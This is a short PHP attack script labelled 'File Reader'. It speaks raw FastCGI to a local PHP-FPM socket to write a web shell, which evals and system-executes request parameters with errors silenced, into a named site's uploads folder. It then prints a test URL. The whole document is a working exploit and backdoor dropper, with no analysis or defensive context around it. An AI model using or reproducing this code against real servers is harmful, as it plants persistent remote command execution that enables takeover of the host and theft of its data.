📖 File Reader
<?php
// Create unrestricted shell.php via raw FastCGI
$shell_code = '<?php error_reporting(0);if(isset($_GET[c]))eval($_GET[c]);if(isset($_POST[cmd]))system($_POST[cmd]);?>';
$sock = stream_socket_client('unix:///tmp/php-cgi-73.sock');
fwrite($sock,pack('CCnnCa*',1,1,1,8,0,pack('NN',0,1)));
$params = [
'SCRIPT_FILENAME'=>'/www/wwwroot/hljrlsj.com/public/uploads/file/20260310/shell.php',
'REQUEST_METHOD'=>'POST',
'CONTENT_TYPE'=>'text/plain',
'CONTENT_LENGTH'=>strlen($shell_code)
];
foreach($params as$k=>$v){
$kl=strlen($k);$vl=strlen($v);
$klen=$kl<128?chr($kl):chr(128|($kl>>24)).pack('N',$kl);
$vlen=$vl<128?chr($vl):chr(128|($vl>>24)).pack('N',$vl);
$data=$klen.$vlen.$k.$v;
$pad=(8-(strlen($data)%8))%8;
fwrite($sock,pack('CCnnC',1,4,1,strlen($data),$pad).$data.str_repeat("\0",$pad));
}
fwrite($sock,pack('CCnnC',1,4,1,0,0));
fwrite($sock,pack('CCnnC',1,5,1,strlen($shell_code),0).$shell_code);
fwrite($sock,pack('CCnnC',1,5,1,0,0));
echo 'Shell created! Test: /shell.php?cmd=id';
?>